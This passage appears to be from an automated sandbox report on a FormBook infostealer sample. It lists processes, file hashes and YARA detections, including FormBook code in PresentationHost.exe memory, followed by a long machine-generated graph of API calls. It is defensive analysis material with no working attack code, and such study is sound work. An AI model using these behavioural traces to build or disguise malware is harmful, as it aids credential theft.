                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:08:06:18
                                                  Start date:02/07/2024
                                                  Path:C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe"
                                                  Imagebase:0x800000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:6
                                                  Start time:08:06:20
                                                  Start date:02/07/2024
                                                  Path:C:\Windows\SysWOW64\PresentationHost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\PresentationHost.exe"
                                                  Imagebase:0xba0000
                                                  File size:256'000 bytes
                                                  MD5 hash:C6671F8B9F073785FD617661AD1F1C45
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4121800336.0000000004A74000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:7
                                                  Start time:08:06:50
                                                  Start date:02/07/2024
                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x7ff6bf500000
                                                  File size:676'768 bytes
                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                    Execution Graph

                                                    Execution Coverage:4.1%
                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                    Signature Coverage:2.9%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:182
LeaveCriticalSection _fseek 98080->98089 98081 6257d4 _memset 98188 628d68 58 API calls __getptd_noexit 98081->98188 98084->98080 98084->98081 98090 624916 98084->98090 98097 6310ab 98084->98097 98165 630df7 98084->98165 98187 630f18 58 API calls 3 library calls 98084->98187 98087->98068 98088->98061 98089->98061 98091 624920 98090->98091 98092 624935 98090->98092 98189 628d68 58 API calls __getptd_noexit 98091->98189 98092->98084 98094 624925 98190 628ff6 9 API calls wcstoxq 98094->98190 98096 624930 98096->98084 98098 6310e3 98097->98098 98099 6310cc 98097->98099 98100 63181b 98098->98100 98105 63111d 98098->98105 98200 628d34 58 API calls __getptd_noexit 98099->98200 98216 628d34 58 API calls __getptd_noexit 98100->98216 98103 6310d1 98201 628d68 58 API calls __getptd_noexit 98103->98201 98107 631125 98105->98107 98114 63113c 98105->98114 98106 631820 98217 628d68 58 API calls __getptd_noexit 98106->98217 98202 628d34 58 API calls __getptd_noexit 98107->98202 98110 631131 98218 628ff6 9 API calls wcstoxq 98110->98218 98111 63112a 98203 628d68 58 API calls __getptd_noexit 98111->98203 98113 631151 98204 628d34 58 API calls __getptd_noexit 98113->98204 98114->98113 98116 63116b 98114->98116 98118 631189 98114->98118 98145 6310d8 98114->98145 98116->98113 98121 631176 98116->98121 98205 628a5d 58 API calls 2 library calls 98118->98205 98191 635ebb 98121->98191 98122 631199 98124 6311a1 98122->98124 98125 6311bc 98122->98125 98123 63128a 98126 631303 ReadFile 98123->98126 98129 6312a0 GetConsoleMode 98123->98129 98206 628d68 58 API calls __getptd_noexit 98124->98206 98208 631b11 60 API calls 3 library calls 98125->98208 98130 6317e3 GetLastError 98126->98130 98131 631325 98126->98131 98136 631300 98129->98136 98137 6312b4 98129->98137 98133 6317f0 98130->98133 98134 6312e3 98130->98134 98131->98130 98139 6312f5 98131->98139 98132 6311a6 98207 628d34 58 API calls __getptd_noexit 98132->98207 98214 628d68 58 API calls __getptd_noexit 98133->98214 98149 6312e9 
98134->98149 98209 628d47 58 API calls 3 library calls 98134->98209 98136->98126 98137->98136 98140 6312ba ReadConsoleW 98137->98140 98147 6315c7 98139->98147 98148 63135a 98139->98148 98139->98149 98140->98139 98142 6312dd GetLastError 98140->98142 98141 6317f5 98215 628d34 58 API calls __getptd_noexit 98141->98215 98142->98134 98145->98084 98146 622f95 _free 58 API calls 98146->98145 98147->98149 98156 6316cd ReadFile 98147->98156 98151 631447 98148->98151 98152 6313c6 ReadFile 98148->98152 98149->98145 98149->98146 98151->98149 98154 631504 98151->98154 98155 6314f4 98151->98155 98159 6314b4 MultiByteToWideChar 98151->98159 98153 6313e7 GetLastError 98152->98153 98164 6313f1 98152->98164 98153->98164 98154->98159 98212 631b11 60 API calls 3 library calls 98154->98212 98211 628d68 58 API calls __getptd_noexit 98155->98211 98158 6316f0 GetLastError 98156->98158 98163 6316fe 98156->98163 98158->98163 98159->98142 98159->98149 98163->98147 98213 631b11 60 API calls 3 library calls 98163->98213 98164->98148 98210 631b11 60 API calls 3 library calls 98164->98210 98166 630e02 98165->98166 98170 630e17 98165->98170 98252 628d68 58 API calls __getptd_noexit 98166->98252 98168 630e07 98253 628ff6 9 API calls wcstoxq 98168->98253 98171 630e4c 98170->98171 98178 630e12 98170->98178 98254 636234 58 API calls __malloc_crt 98170->98254 98173 624916 __flush 58 API calls 98171->98173 98174 630e60 98173->98174 98219 630f97 98174->98219 98176 630e67 98177 624916 __flush 58 API calls 98176->98177 98176->98178 98179 630e8a 98177->98179 98178->98084 98179->98178 98180 624916 __flush 58 API calls 98179->98180 98181 630e96 98180->98181 98181->98178 98182 624916 __flush 58 API calls 98181->98182 98183 630ea3 98182->98183 98184 624916 __flush 58 API calls 98183->98184 98184->98178 98185->98076 98186->98080 98187->98084 98188->98076 98189->98094 98190->98096 98192 635ed3 98191->98192 98193 635ec6 98191->98193 98196 635edf 98192->98196 98197 628d68 wcstoxq 58 API calls 98192->98197 98194 
628d68 wcstoxq 58 API calls 98193->98194 98195 635ecb 98194->98195 98195->98123 98196->98123 98198 635f00 98197->98198 98199 628ff6 wcstoxq 9 API calls 98198->98199 98199->98195 98200->98103 98201->98145 98202->98111 98203->98110 98204->98111 98205->98122 98206->98132 98207->98145 98208->98121 98209->98149 98210->98164 98211->98149 98212->98159 98213->98163 98214->98141 98215->98149 98216->98106 98217->98110 98218->98145 98220 630fa3 __setmbcp 98219->98220 98221 630fb0 98220->98221 98222 630fc7 98220->98222 98223 628d34 __commit 58 API calls 98221->98223 98224 63108b 98222->98224 98225 630fdb 98222->98225 98227 630fb5 98223->98227 98226 628d34 __commit 58 API calls 98224->98226 98228 631006 98225->98228 98229 630ff9 98225->98229 98230 630ffe 98226->98230 98231 628d68 wcstoxq 58 API calls 98227->98231 98233 631013 98228->98233 98234 631028 98228->98234 98232 628d34 __commit 58 API calls 98229->98232 98237 628d68 wcstoxq 58 API calls 98230->98237 98245 630fbc __setmbcp 98231->98245 98232->98230 98235 628d34 __commit 58 API calls 98233->98235 98236 62d446 ___lock_fhandle 59 API calls 98234->98236 98238 631018 98235->98238 98239 63102e 98236->98239 98240 631020 98237->98240 98241 628d68 wcstoxq 58 API calls 98238->98241 98242 631041 98239->98242 98243 631054 98239->98243 98247 628ff6 wcstoxq 9 API calls 98240->98247 98241->98240 98246 6310ab __read_nolock 70 API calls 98242->98246 98244 628d68 wcstoxq 58 API calls 98243->98244 98248 631059 98244->98248 98245->98176 98249 63104d 98246->98249 98247->98245 98250 628d34 __commit 58 API calls 98248->98250 98251 631083 __read LeaveCriticalSection 98249->98251 98250->98249 98251->98245 98252->98168 98253->98178 98254->98171 98258 62543a GetSystemTimeAsFileTime 98255->98258 98257 6691f8 98257->97847 98259 625468 __aulldiv 98258->98259 98259->98257 98261 625e9c __setmbcp 98260->98261 98262 625ec3 98261->98262 98263 625eae 98261->98263 98265 626e4e __lock_file 59 API calls 98262->98265 98274 628d68 58 API calls __getptd_noexit 
98263->98274 98267 625ec9 98265->98267 98266 625eb3 98275 628ff6 9 API calls wcstoxq 98266->98275 98276 625b00 67 API calls 6 library calls 98267->98276 98270 625ebe __setmbcp 98270->97851 98271 625ed4 98277 625ef4 LeaveCriticalSection LeaveCriticalSection _fseek 98271->98277 98273 625ee6 98273->98270 98274->98266 98275->98270 98276->98271 98277->98273 98278->97705 98279->97713 98280->97726 98281->97729 98282->97725 98283->97734 98285 6092c9 Mailbox 98284->98285 98286 63f5c8 98285->98286 98291 6092d3 98285->98291 98287 620ff6 Mailbox 59 API calls 98286->98287 98288 63f5d4 98287->98288 98289 6092da 98289->97740 98291->98289 98292 609df0 59 API calls Mailbox 98291->98292 98292->98291 98293->97749 98294->97743 98298 6699d2 __tzset_nolock _wcscmp 98295->98298 98296 60506b 74 API calls 98296->98298 98297 669393 GetSystemTimeAsFileTime 98297->98298 98298->98296 98298->98297 98299 669866 98298->98299 98300 605045 85 API calls 98298->98300 98299->97755 98299->97781 98300->98298 98302 668da9 98301->98302 98303 668d9b 98301->98303 98305 668dee 98302->98305 98306 62548b 115 API calls 98302->98306 98317 668db2 98302->98317 98304 62548b 115 API calls 98303->98304 98304->98302 98332 66901b 98305->98332 98308 668dd3 98306->98308 98308->98305 98310 668ddc 98308->98310 98309 668e32 98311 668e36 98309->98311 98312 668e57 98309->98312 98314 6255d6 __fcloseall 83 API calls 98310->98314 98310->98317 98313 668e43 98311->98313 98316 6255d6 __fcloseall 83 API calls 98311->98316 98336 668c33 98312->98336 98313->98317 98319 6255d6 __fcloseall 83 API calls 98313->98319 98314->98317 98316->98313 98317->97784 98319->98317 98320 668e85 98345 668eb5 98320->98345 98321 668e65 98322 668e72 98321->98322 98324 6255d6 __fcloseall 83 API calls 98321->98324 98322->98317 98326 6255d6 __fcloseall 83 API calls 98322->98326 98324->98322 98326->98317 98329 668ea0 98329->98317 98331 6255d6 __fcloseall 83 API calls 98329->98331 98331->98317 98333 669040 98332->98333 98334 669029 __tzset_nolock _memmove 
98332->98334 98335 625812 __fread_nolock 74 API calls 98333->98335 98334->98309 98335->98334 98337 62594c __crtCompareStringA_stat 58 API calls 98336->98337 98338 668c42 98337->98338 98339 62594c __crtCompareStringA_stat 58 API calls 98338->98339 98340 668c56 98339->98340 98341 62594c __crtCompareStringA_stat 58 API calls 98340->98341 98342 668c6a 98341->98342 98343 668f97 58 API calls 98342->98343 98344 668c7d 98342->98344 98343->98344 98344->98320 98344->98321 98347 668eca 98345->98347 98346 668f82 98374 6691bf 98346->98374 98347->98346 98349 668e8c 98347->98349 98350 668c8f 74 API calls 98347->98350 98378 668d2b 74 API calls 98347->98378 98379 66909c 80 API calls 98347->98379 98353 668f97 98349->98353 98350->98347 98354 668fa4 98353->98354 98358 668faa 98353->98358 98355 622f95 _free 58 API calls 98354->98355 98355->98358 98356 668fbb 98357 668e93 98356->98357 98360 622f95 _free 58 API calls 98356->98360 98357->98329 98361 6255d6 98357->98361 98358->98356 98359 622f95 _free 58 API calls 98358->98359 98359->98356 98360->98357 98362 6255e2 __setmbcp 98361->98362 98363 6255f6 98362->98363 98364 62560e 98362->98364 98461 628d68 58 API calls __getptd_noexit 98363->98461 98366 626e4e __lock_file 59 API calls 98364->98366 98370 625606 __setmbcp 98364->98370 98369 625620 98366->98369 98367 6255fb 98462 628ff6 9 API calls wcstoxq 98367->98462 98445 62556a 98369->98445 98370->98329 98375 6691dd 98374->98375 98376 6691cc 98374->98376 98375->98349 98380 624a93 98376->98380 98378->98347 98379->98347 98381 624a9f __setmbcp 98380->98381 98382 624ad5 98381->98382 98383 624abd 98381->98383 98386 624acd __setmbcp 98381->98386 98384 626e4e __lock_file 59 API calls 98382->98384 98405 628d68 58 API calls __getptd_noexit 98383->98405 98387 624adb 98384->98387 98386->98375 98393 62493a 98387->98393 98388 624ac2 98406 628ff6 9 API calls wcstoxq 98388->98406 98395 624949 98393->98395 98400 624967 98393->98400 98394 624957 98436 628d68 58 API calls __getptd_noexit 98394->98436 
98395->98394 98395->98400 98403 624981 _memmove 98395->98403 98397 62495c 98437 628ff6 9 API calls wcstoxq 98397->98437 98407 624b0d LeaveCriticalSection LeaveCriticalSection _fseek 98400->98407 98402 624916 __flush 58 API calls 98402->98403 98403->98400 98403->98402 98408 62dac6 98403->98408 98438 624c6d 98403->98438 98444 62b05e 78 API calls 7 library calls 98403->98444 98405->98388 98406->98386 98407->98386 98409 62dad2 __setmbcp 98408->98409 98410 62daf6 98409->98410 98411 62dadf 98409->98411 98413 62db95 98410->98413 98415 62db0a 98410->98415 98412 628d34 __commit 58 API calls 98411->98412 98414 62dae4 98412->98414 98416 628d34 __commit 58 API calls 98413->98416 98417 628d68 wcstoxq 58 API calls 98414->98417 98418 62db32 98415->98418 98419 62db28 98415->98419 98424 62db2d 98416->98424 98433 62daeb __setmbcp 98417->98433 98420 62d446 ___lock_fhandle 59 API calls 98418->98420 98421 628d34 __commit 58 API calls 98419->98421 98422 62db38 98420->98422 98421->98424 98425 62db4b 98422->98425 98426 62db5e 98422->98426 98423 628d68 wcstoxq 58 API calls 98427 62dba1 98423->98427 98424->98423 98428 62dbb5 __write_nolock 76 API calls 98425->98428 98430 628d68 wcstoxq 58 API calls 98426->98430 98429 628ff6 wcstoxq 9 API calls 98427->98429 98431 62db57 98428->98431 98429->98433 98432 62db63 98430->98432 98435 62db8d __write LeaveCriticalSection 98431->98435 98434 628d34 __commit 58 API calls 98432->98434 98433->98403 98434->98431 98435->98433 98436->98397 98437->98400 98439 624ca4 98438->98439 98440 624c80 98438->98440 98439->98403 98440->98439 98441 624916 __flush 58 API calls 98440->98441 98442 624c9d 98441->98442 98443 62dac6 __write 78 API calls 98442->98443 98443->98439 98444->98403 98446 625579 98445->98446 98447 62558d 98445->98447 98494 628d68 58 API calls __getptd_noexit 98446->98494 98448 625589 98447->98448 98450 624c6d __flush 78 API calls 98447->98450 98463 625645 LeaveCriticalSection LeaveCriticalSection _fseek 98448->98463 98452 625599 98450->98452 98451 
62557e 98495 628ff6 9 API calls wcstoxq 98451->98495 98464 630dc7 98452->98464 98456 624916 __flush 58 API calls 98457 6255a7 98456->98457 98468 630c52 98457->98468 98459 6255ad 98459->98448 98460 622f95 _free 58 API calls 98459->98460 98460->98448 98461->98367 98462->98370 98463->98370 98465 6255a1 98464->98465 98466 630dd4 98464->98466 98465->98456 98466->98465 98467 622f95 _free 58 API calls 98466->98467 98467->98465 98469 630c5e __setmbcp 98468->98469 98470 630c82 98469->98470 98471 630c6b 98469->98471 98472 630d0d 98470->98472 98474 630c92 98470->98474 98520 628d34 58 API calls __getptd_noexit 98471->98520 98525 628d34 58 API calls __getptd_noexit 98472->98525 98477 630cb0 98474->98477 98478 630cba 98474->98478 98476 630c70 98521 628d68 58 API calls __getptd_noexit 98476->98521 98522 628d34 58 API calls __getptd_noexit 98477->98522 98496 62d446 98478->98496 98479 630cb5 98526 628d68 58 API calls __getptd_noexit 98479->98526 98484 630cc0 98486 630cd3 98484->98486 98487 630cde 98484->98487 98485 630d19 98527 628ff6 9 API calls wcstoxq 98485->98527 98505 630d2d 98486->98505 98523 628d68 58 API calls __getptd_noexit 98487->98523 98490 630c77 __setmbcp 98490->98459 98492 630cd9 98524 630d05 LeaveCriticalSection __unlock_fhandle 98492->98524 98494->98451 98495->98448 98497 62d452 __setmbcp 98496->98497 98498 62d4a1 EnterCriticalSection 98497->98498 98499 629e4b __lock 58 API calls 98497->98499 98500 62d4c7 __setmbcp 98498->98500 98501 62d477 98499->98501 98500->98484 98502 62d48f 98501->98502 98528 62a06b InitializeCriticalSectionAndSpinCount 98501->98528 98529 62d4cb LeaveCriticalSection _doexit 98502->98529 98530 62d703 98505->98530 98507 630d91 98543 62d67d 59 API calls 2 library calls 98507->98543 98509 630d3b 98509->98507 98510 630d6f 98509->98510 98513 62d703 __commit 58 API calls 98509->98513 98510->98507 98511 62d703 __commit 58 API calls 98510->98511 98514 630d7b FindCloseChangeNotification 98511->98514 98512 630d99 98519 630dbb 98512->98519 98544 628d47 58 
API calls 3 library calls 98512->98544 98515 630d66 98513->98515 98514->98507 98516 630d87 GetLastError 98514->98516 98518 62d703 __commit 58 API calls 98515->98518 98516->98507 98518->98510 98519->98492 98520->98476 98521->98490 98522->98479 98523->98492 98524->98490 98525->98479 98526->98485 98527->98490 98528->98502 98529->98498 98531 62d723 98530->98531 98532 62d70e 98530->98532 98535 628d34 __commit 58 API calls 98531->98535 98537 62d748 98531->98537 98533 628d34 __commit 58 API calls 98532->98533 98534 62d713 98533->98534 98536 628d68 wcstoxq 58 API calls 98534->98536 98538 62d752 98535->98538 98539 62d71b 98536->98539 98537->98509 98540 628d68 wcstoxq 58 API calls 98538->98540 98539->98509 98541 62d75a 98540->98541 98542 628ff6 wcstoxq 9 API calls 98541->98542 98542->98539 98543->98512 98544->98519 98607 631b90 98545->98607 98548 6048f7 98613 607eec 98548->98613 98549 6048da 98550 607d2c 59 API calls 98549->98550 98552 6048e6 98550->98552 98609 607886 98552->98609 98555 6209d5 98556 631b90 __write_nolock 98555->98556 98557 6209e2 GetLongPathNameW 98556->98557 98558 607d2c 59 API calls 98557->98558 98559 60741d 98558->98559 98560 60716b 98559->98560 98561 6077c7 59 API calls 98560->98561 98562 60717d 98561->98562 98563 6048ae 60 API calls 98562->98563 98564 607188 98563->98564 98565 607193 98564->98565 98566 63ecae 98564->98566 98567 603f84 59 API calls 98565->98567 98570 63ecc8 98566->98570 98627 607a68 61 API calls 98566->98627 98569 60719f 98567->98569 98621 6034c2 98569->98621 98572 6071b2 Mailbox 98572->97473 98574 604f3d 136 API calls 98573->98574 98575 6069ef 98574->98575 98576 63e45a 98575->98576 98578 604f3d 136 API calls 98575->98578 98577 6697e5 122 API calls 98576->98577 98580 63e46f 98577->98580 98579 606a03 98578->98579 98579->98576 98581 606a0b 98579->98581 98582 63e473 98580->98582 98583 63e490 98580->98583 98584 606a17 98581->98584 98585 63e47b 98581->98585 98586 604faa 84 API calls 98582->98586 98587 620ff6 Mailbox 59 API calls 98583->98587 
98628 606bec 98584->98628 98743 664534 90 API calls _wprintf 98585->98743 98586->98585 98606 63e4d5 Mailbox 98587->98606 98591 63e489 98591->98583 98592 63e689 98593 622f95 _free 58 API calls 98592->98593 98594 63e691 98593->98594 98595 604faa 84 API calls 98594->98595 98600 63e69a 98595->98600 98599 622f95 _free 58 API calls 98599->98600 98600->98599 98601 604faa 84 API calls 98600->98601 98745 65fcb1 89 API calls 4 library calls 98600->98745 98601->98600 98603 607f41 59 API calls 98603->98606 98606->98592 98606->98600 98606->98603 98720 65fc4d 98606->98720 98723 667621 98606->98723 98729 60766f 98606->98729 98737 6074bd 98606->98737 98744 65fb6e 61 API calls 2 library calls 98606->98744 98608 6048bb GetFullPathNameW 98607->98608 98608->98548 98608->98549 98610 607894 98609->98610 98617 607e8c 98610->98617 98612 6048f2 98612->98555 98614 607f06 98613->98614 98616 607ef9 98613->98616 98615 620ff6 Mailbox 59 API calls 98614->98615 98615->98616 98616->98552 98618 607e9a 98617->98618 98620 607ea3 _memmove 98617->98620 98619 607faf 59 API calls 98618->98619 98618->98620 98619->98620 98620->98612 98622 6034d4 98621->98622 98626 6034f3 _memmove 98621->98626 98625 620ff6 Mailbox 59 API calls 98622->98625 98623 620ff6 Mailbox 59 API calls 98624 60350a 98623->98624 98624->98572 98625->98626 98626->98623 98627->98566 98629 63e847 98628->98629 98630 606c15 98628->98630 98837 65fcb1 89 API calls 4 library calls 98629->98837 98751 605906 60 API calls Mailbox 98630->98751 98633 63e85a 98838 65fcb1 89 API calls 4 library calls 98633->98838 98634 606c37 98752 605956 98634->98752 98638 606c54 98640 6077c7 59 API calls 98638->98640 98639 63e876 98643 606cc1 98639->98643 98641 606c60 98640->98641 98765 620b9b 60 API calls __write_nolock 98641->98765 98645 63e889 98643->98645 98646 606ccf 98643->98646 98644 606c6c 98647 6077c7 59 API calls 98644->98647 98648 605dcf CloseHandle 98645->98648 98649 6077c7 59 API calls 98646->98649 98650 606c78 98647->98650 98651 63e895 98648->98651 98652 
606cd8 98649->98652 98653 6048ae 60 API calls 98650->98653 98654 604f3d 136 API calls 98651->98654 98655 6077c7 59 API calls 98652->98655 98656 606c86 98653->98656 98657 63e8b1 98654->98657 98658 606ce1 98655->98658 98766 6059b0 ReadFile SetFilePointerEx 98656->98766 98660 63e8da 98657->98660 98665 6697e5 122 API calls 98657->98665 98775 6046f9 98658->98775 98839 65fcb1 89 API calls 4 library calls 98660->98839 98662 606cf8 98666 607c8e 59 API calls 98662->98666 98664 606cb2 98767 605c4e 98664->98767 98668 63e8cd 98665->98668 98669 606d09 SetCurrentDirectoryW 98666->98669 98670 63e8f6 98668->98670 98671 63e8d5 98668->98671 98676 606d1c Mailbox 98669->98676 98673 604faa 84 API calls 98670->98673 98672 604faa 84 API calls 98671->98672 98672->98660 98674 63e8fb 98673->98674 98675 620ff6 Mailbox 59 API calls 98674->98675 98682 63e92f 98675->98682 98678 620ff6 Mailbox 59 API calls 98676->98678 98680 606d2f 98678->98680 98679 603bcd 98679->97327 98679->97336 98681 60538e 59 API calls 98680->98681 98690 606d3a Mailbox __NMSG_WRITE 98681->98690 98683 60766f 59 API calls 98682->98683 98715 63e978 Mailbox 98683->98715 98684 606e47 98833 605dcf 98684->98833 98685 63eb69 98842 667581 59 API calls Mailbox 98685->98842 98689 606e6c Mailbox 98746 605934 98689->98746 98690->98684 98703 63ebfa 98690->98703 98706 607f41 59 API calls 98690->98706 98707 63ec02 98690->98707 98826 6059cd 67 API calls _wcscpy 98690->98826 98827 6070bd GetStringTypeW 98690->98827 98828 60702c 60 API calls __wcsnicmp 98690->98828 98829 60710a GetStringTypeW __NMSG_WRITE 98690->98829 98830 62387d GetStringTypeW _iswctype 98690->98830 98831 606a3c 165 API calls 3 library calls 98690->98831 98832 607373 59 API calls Mailbox 98690->98832 98693 63eb8b 98843 66f835 59 API calls 2 library calls 98693->98843 98696 63eb98 98697 622f95 _free 58 API calls 98696->98697 98697->98689 98700 60766f 59 API calls 98700->98715 98845 65fb07 59 API calls 4 library calls 98703->98845 98706->98690 98846 65fcb1 89 API calls 4 
library calls 98707->98846 98709 65fc4d 59 API calls 98709->98715 98710 607f41 59 API calls 98710->98715 98712 667621 59 API calls 98712->98715 98714 63ebbb 98844 65fcb1 89 API calls 4 library calls 98714->98844 98715->98685 98715->98700 98715->98709 98715->98710 98715->98712 98715->98714 98840 65fb6e 61 API calls 2 library calls 98715->98840 98841 607373 59 API calls Mailbox 98715->98841 98717 63ebd4 98718 622f95 _free 58 API calls 98717->98718 98719 63e8f1 98718->98719 98719->98689 98721 620ff6 Mailbox 59 API calls 98720->98721 98722 65fc7d _memmove 98721->98722 98722->98606 98724 66762c 98723->98724 98725 620ff6 Mailbox 59 API calls 98724->98725 98726 667643 98725->98726 98727 667652 98726->98727 98728 607f41 59 API calls 98726->98728 98727->98606 98728->98727 98730 60770f 98729->98730 98733 607682 _memmove 98729->98733 98732 620ff6 Mailbox 59 API calls 98730->98732 98731 620ff6 Mailbox 59 API calls 98734 607689 98731->98734 98732->98733 98733->98731 98735 620ff6 Mailbox 59 API calls 98734->98735 98736 6076b2 98734->98736 98735->98736 98736->98606 98738 6074d0 98737->98738 98740 60757e 98737->98740 98739 620ff6 Mailbox 59 API calls 98738->98739 98742 607502 98738->98742 98739->98742 98740->98606 98741 620ff6 59 API calls Mailbox 98741->98742 98742->98740 98742->98741 98743->98591 98744->98606 98745->98600 98747 605dcf CloseHandle 98746->98747 98748 60593c Mailbox 98747->98748 98749 605dcf CloseHandle 98748->98749 98750 60594b 98749->98750 98750->98679 98751->98634 98753 605dcf CloseHandle 98752->98753 98754 605962 98753->98754 98847 605df9 98754->98847 98756 605981 98757 6059a4 98756->98757 98855 605770 98756->98855 98757->98633 98757->98638 98759 605993 98872 6053db SetFilePointerEx SetFilePointerEx 98759->98872 98761 63e030 98873 663696 SetFilePointerEx SetFilePointerEx WriteFile 98761->98873 98762 60599a 98762->98757 98762->98761 98764 63e060 98764->98757 98765->98644 98766->98664 98773 605c68 98767->98773 98768 63e151 98887 605dae SetFilePointerEx 
98768->98887 98769 605cef SetFilePointerEx 98886 605dae SetFilePointerEx 98769->98886 98772 63e16b 98773->98768 98773->98769 98774 605cc3 98773->98774 98774->98643 98776 6077c7 59 API calls 98775->98776 98777 60470f 98776->98777 98778 6077c7 59 API calls 98777->98778 98779 604717 98778->98779 98780 6077c7 59 API calls 98779->98780 98781 60471f 98780->98781 98782 6077c7 59 API calls 98781->98782 98783 604727 98782->98783 98784 63d8fb 98783->98784 98785 60475b 98783->98785 98786 6081a7 59 API calls 98784->98786 98787 6079ab 59 API calls 98785->98787 98788 63d904 98786->98788 98789 604769 98787->98789 98790 607eec 59 API calls 98788->98790 98791 607e8c 59 API calls 98789->98791 98794 60479e 98790->98794 98792 604773 98791->98792 98792->98794 98795 6079ab 59 API calls 98792->98795 98793 6047de 98888 6079ab 98793->98888 98794->98793 98797 6047bd 98794->98797 98807 63d924 98794->98807 98798 604794 98795->98798 98801 607b52 59 API calls 98797->98801 98800 607e8c 59 API calls 98798->98800 98799 63d9f4 98803 607d2c 59 API calls 98799->98803 98800->98794 98804 6047c7 98801->98804 98802 6047ef 98805 604801 98802->98805 98808 6081a7 59 API calls 98802->98808 98816 63d9b1 98803->98816 98804->98793 98812 6079ab 59 API calls 98804->98812 98806 604811 98805->98806 98809 6081a7 59 API calls 98805->98809 98811 604818 98806->98811 98813 6081a7 59 API calls 98806->98813 98807->98799 98810 63d9dd 98807->98810 98823 63d95b 98807->98823 98808->98805 98809->98806 98810->98799 98817 63d9c8 98810->98817 98814 60481f Mailbox 98811->98814 98815 6081a7 59 API calls 98811->98815 98812->98793 98813->98811 98814->98662 98815->98814 98816->98793 98821 607b52 59 API calls 98816->98821 98901 607a84 59 API calls 2 library calls 98816->98901 98820 607d2c 59 API calls 98817->98820 98818 63d9b9 98819 607d2c 59 API calls 98818->98819 98819->98816 98820->98816 98821->98816 98823->98818 98824 63d9a4 98823->98824 98825 607d2c 59 API calls 98824->98825 98825->98816 98826->98690 98827->98690 98828->98690 
98829->98690 98830->98690 98831->98690 98832->98690 98837->98633 98838->98639 98839->98719 98840->98715 98841->98715 98842->98693 98843->98696 98844->98717 98845->98707 98848 63e181 98847->98848 98849 605e12 CreateFileW 98847->98849 98850 63e187 CreateFileW 98848->98850 98851 605e34 98848->98851 98849->98851 98850->98851 98852 63e1ad 98850->98852 98851->98756 98853 605c4e 2 API calls 98852->98853 98854 63e1b8 98853->98854 98854->98851 98856 60578b 98855->98856 98857 63dfce 98855->98857 98858 605c4e 2 API calls 98856->98858 98871 60581a 98856->98871 98857->98871 98880 605e3f 98857->98880 98859 6057ad 98858->98859 98860 60538e 59 API calls 98859->98860 98862 6057b7 98860->98862 98862->98857 98863 6057c4 98862->98863 98864 620ff6 Mailbox 59 API calls 98863->98864 98865 6057cf 98864->98865 98866 60538e 59 API calls 98865->98866 98867 6057da 98866->98867 98874 605d20 98867->98874 98870 605c4e 2 API calls 98870->98871 98871->98759 98872->98762 98873->98764 98875 605d93 98874->98875 98879 605d2e 98874->98879 98885 605dae SetFilePointerEx 98875->98885 98877 605807 98877->98870 98878 605d66 ReadFile 98878->98877 98878->98879 98879->98877 98879->98878 98881 605c4e 2 API calls 98880->98881 98882 605e60 98881->98882 98883 605c4e 2 API calls 98882->98883 98884 605e74 98883->98884 98884->98871 98885->98879 98886->98774 98887->98772 98889 607a17 98888->98889 98890 6079ba 98888->98890 98891 607e8c 59 API calls 98889->98891 98890->98889 98892 6079c5 98890->98892 98898 6079e8 _memmove 98891->98898 